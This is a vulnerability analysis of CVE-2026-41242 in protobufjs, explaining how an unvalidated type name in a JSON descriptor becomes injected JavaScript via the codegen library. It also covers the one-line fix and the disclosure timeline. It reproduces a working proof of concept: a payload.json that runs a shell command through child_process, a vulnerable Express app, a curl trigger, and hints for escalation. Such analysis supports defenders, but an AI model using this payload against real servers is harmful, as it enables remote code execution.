CVE-2026-41242: protobufjs's Type Name Was JavaScript

The codegen library treats the function-name parameter as source code

@protobufjs/codegen is a hundred-line npm package that protobufjs uses to build per-type encoder, decoder, verifier, and converter functions at runtime. Its public API is one function: codegen(params, name). The author appends to the body with format-string calls, then finalizes with a scope object. The build step is a string concatenation:

function toString(functionNameOverride) {
    return "function " + (functionNameOverride || functionName || "") +
           "(" + (functionParams && functionParams.join(",") || "") +
           "){\n  " + body.join("\n  ") + "\n}";
}

Body lines are appended with %i, %j, %s format specifiers. The JSON specifier is the load-bearing one: gen("foo=%j", value) JSON-stringifies value so it embeds as a valid JS literal even when it carries quotes, newlines, or backslashes. Every author writing a body line understands that the formatter is responsible for escaping data into source.

The function-name parameter has no formatter. It is interpolated bare. The library's contract is implicit: callers must pass a string that is also a valid JavaScript identifier. Nothing in the library checks the contract. Nothing in the library documents it as a contract. The README's first sentence reads "A minimalistic code generation utility." It is.

Six call sites, one trust boundary, and it lived nowhere

protobufjs builds five families of generated functions per message type. Each generator picks a function name in the same shape:

// src/decoder.js:19
var gen = util.codegen(["r", "l", "e"], mtype.name + "$decode")
// src/encoder.js:30
var gen = util.codegen(["m", "w"], mtype.name + "$encode")
// src/verifier.js:125
var gen = util.codegen(["m"], mtype.name + "$verify")
// src/converter.js:108
var gen = util.codegen(["d"], mtype.name + "$fromObject")
// src/converter.js:211
var gen = util.codegen(["m", "o"], mtype.name + "$toObject")
// src/type.js:200
var gen = util.codegen(["p"], mtype.name);

Six places. Every one of them appends a verb to mtype.name and passes the result as the function name. The name comes from Type.prototype.name, set in the constructor:

function Type(name, options) {
    Namespace.call(this, name, options);
    ...
}

name is whatever the caller passed. Pre-patch, the constructor performs no validation. The Namespace base class stores it on this.name. Six codegen sites read it back and concatenate.

The trust boundary lived nowhere. The decoder author trusted Type. Type trusted its caller. The codegen library trusted Type. None of the three layers between the wire and the generated Function() constructor held the responsibility of checking that the name was a JavaScript identifier. The patch makes Type the holder. Pre-patch, nobody held it.

The exploit primitive

A protobuf descriptor in JSON form is a dictionary of message types, each with named fields. A field's type value is the name of either a primitive (int32, string) or another message type defined elsewhere in the same descriptor. Root.fromJSON walks the dictionary and constructs a Type per entry, taking the dictionary key as the name. The PoC's payload.json makes the dictionary key the injection vector:

{
  "nested": {
    "User": {
      "fields": {
        "id":   { "type": "int32", "id": 1 },
        "data": {
          "type": "Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\nfunction X",
          "id": 2
        }
      }
    },
    "Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\nfunction X": {
      "fields": { "content": { "type": "string", "id": 1 } }
    }
  }
}

Two message types. The second is keyed by Data(){...payload...};\nfunction X. User.data references it by that exact key. The vulnerable web app the PoC ships with is twenty lines:

const express = require('express');
const protobuf = require('protobufjs');

const app = express();
app.use(express.json());

app.post('/create_user', (request, response) => {
    const descriptor = request.body;
    const root = protobuf.Root.fromJSON(descriptor);
    const UserType = root.lookupType('User');
    const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);
    try { UserType.decode(userBytes); } catch (e) { }
});

app.listen(3000);

The route accepts a JSON body, builds a protobuf root from it, looks up User, and decodes a fixed seven-byte payload. The userBytes decode to User { id: 1, data: Data { content: "hello" } }. The decode of the data field is what reaches the second Type and triggers code generation for it.

Type.prototype.decode is a stub that calls this.setup() on first invocation and replaces itself with the generated function. setup() calls all five codegen generators in sequence. The first one is encoder(), which calls:

var gen = util.codegen(["m", "w"], mtype.name + "$encode")

For the second Type, mtype.name is the malicious string. mtype.name + "$encode" becomes Data(){...};\nfunction X$encode. The codegen library appends body lines, then finalizes. toString() returns:

function Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};
function X$encode(m,w){
  ...encoder body...
}

The library prepends return to that source and passes it to the Function constructor:

source = "return " + source;
...
return Function.apply(null, scopeParams).apply(null, scopeValues);

return function Data(){...} is a return statement followed by a function expression. The expression evaluates to a function object; the return statement returns it; the rest of the source (the X$encode declaration) is unreachable code that never runs. The library then calls .apply(null, scopeValues) on the returned function. The returned function is Data. Calling it executes console.log(process.mainModule.require('child_process').execSync('id').toString()).

The single curl that fires this:

curl -X POST -H 'Content-Type: application/json' \
  http://target:3000/create_user --data @payload.json

The PoC's harness has no exposed return path for command output, so the demonstration writes to console.log. A real attack would write to a file, hit an outbound URL, or replace the function body with eval(process.env.REMOTE_PAYLOAD). The descriptor is JSON; the parser reads it without size limit; the function-name slot accepts every Unicode character. The 4chech harness ships the minimum demonstration. The class admits arbitrarily larger payloads.

What the description names

The cve.org record reads: "attackers can inject arbitrary code in the 'type' fields of protobuf definitions, which will then execute during object decoding using that definition." The description is correct on every word. It is also not enough to find the bug.

A defender reading the description without the codepath looks for a JSON parser that evals input, finds none, and concludes the bug must be in protobuf-message bytes rather than protobuf-descriptor objects. The wire payload in the PoC is [0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f], an unremarkable seven-byte serialization. The injection lives in the descriptor. The "during object decoding" timing means the codegen runs lazily on first decode() rather than eagerly during Root.fromJSON, so a server that parses descriptors but never decodes against them is not exploitable, and a server that does both is fully exploitable. The description leaves both halves of that distinction to the reader.

This is content-is-command

A JSON descriptor is content. The codegen library is an interpreter that reads strings out of the descriptor and produces JavaScript. The bridge is the function-name parameter in @protobufjs/codegen, where strings cross from the data plane to the source-text plane without escaping. The pattern's Content Is Command reading covers this exactly: an external input channel feeds an interpreter that treats it as instructions because the interpreter never separated instruction from data at the boundary the channel was crossing.

The closest sibling exhibit is graphql-ruby. CVE-2025-27407 took a JSON introspection document, read field names from it, and spliced them into a Ruby class_eval <<-RUBY HEREDOC that defined methods. The interpreter was the Ruby compiler; the bridge was an unescaped name interpolation; the content source was an external schema document. The graphql-ruby fix added /^[_a-zA-Z][_a-zA-Z0-9]*$/ to the name handler and replaced the class_eval with a captured-closure define_method. The protobufjs case is the same shape with JavaScript and Function() in place of Ruby and class_eval, and a JSON descriptor in place of a JSON introspection document. The protobufjs fix is the regex equivalent. Both fixes name the contract the loader was supposed to enforce and never had.

The fix is at Type. The library is unchanged.

The patch is one line in src/type.js:

 function Type(name, options) {
+    name = name.replace(/\W/g, "");
     Namespace.call(this, name, options);

\W matches every character that is not in [A-Za-z0-9_]. Parentheses, semicolons, newlines, dots, brackets, slashes, spaces, every Unicode codepoint outside the identifier class. The patch's commit message: "There is no reason why the type name would contain anything other than alphanumeric characters. Filter the remaining characters with a regex." The contract is named for the first time in the line that enforces it.

@protobufjs/codegen is a separate package on npm with its own version (2.0.4 as shipped in vulnerable installs). The codegen package's Codegen.toString still concatenates the functionName parameter into source text without validation. Any other consumer of @protobufjs/codegen that passes caller-influenced strings as the function name has the same primitive available. The package's README, its TypeScript types, and its index.js source contain no statement that the function name must be a valid JavaScript identifier.

protobufjs's fix solves protobufjs. It is the right shape of fix; the Type constructor is the natural choke point for incoming descriptor data, and one regex there protects all six call sites with no per-site changes. It does not solve @protobufjs/codegen, which continues to publish under the contract-by-implication it always had. The function-name slot is the only parameter in @protobufjs/codegen with no escape formatter. It is also the only one this CVE ever needed.

The disclosure window was the diff

Cristian Staicu of Endor Labs filed protobufjs issue #2124 on February 25, 2026. The issue body contains no technical detail; it asks the maintainers to set up a security policy and a private advisory channel so the report can move out of the public tracker. Pull request #2127 with the one-line fix landed in master on March 11, 2026, with the commit message quoted above. The release tagged protobufjs-cli-v2.0.1 carries the fix at 535df44. The GitHub Security Advisory was not published until April 16, 2026.

Thirty-six days separated the public commit from the public advisory. The diff itself was the disclosure: a maintainer-written patch that strips non-alphanumeric characters from a type name describes a class of input that previously was not stripped, and the consumers of that name (the six codegen sites listed above) are the obvious places to look. The PoC at 4chech/CVE-2026-41242 ships with Russian comments (// JSON-дескриптор из тела запроса), pins protobufjs ^7.5.4, and reproduces against the upstream commit immediately preceding the fix. The author did not need access to the advisory to build the harness. The commit was enough.

PoC: 4chech/CVE-2026-41242

The patch closes this CVE. The codegen library that interpolated the name into source code is unchanged.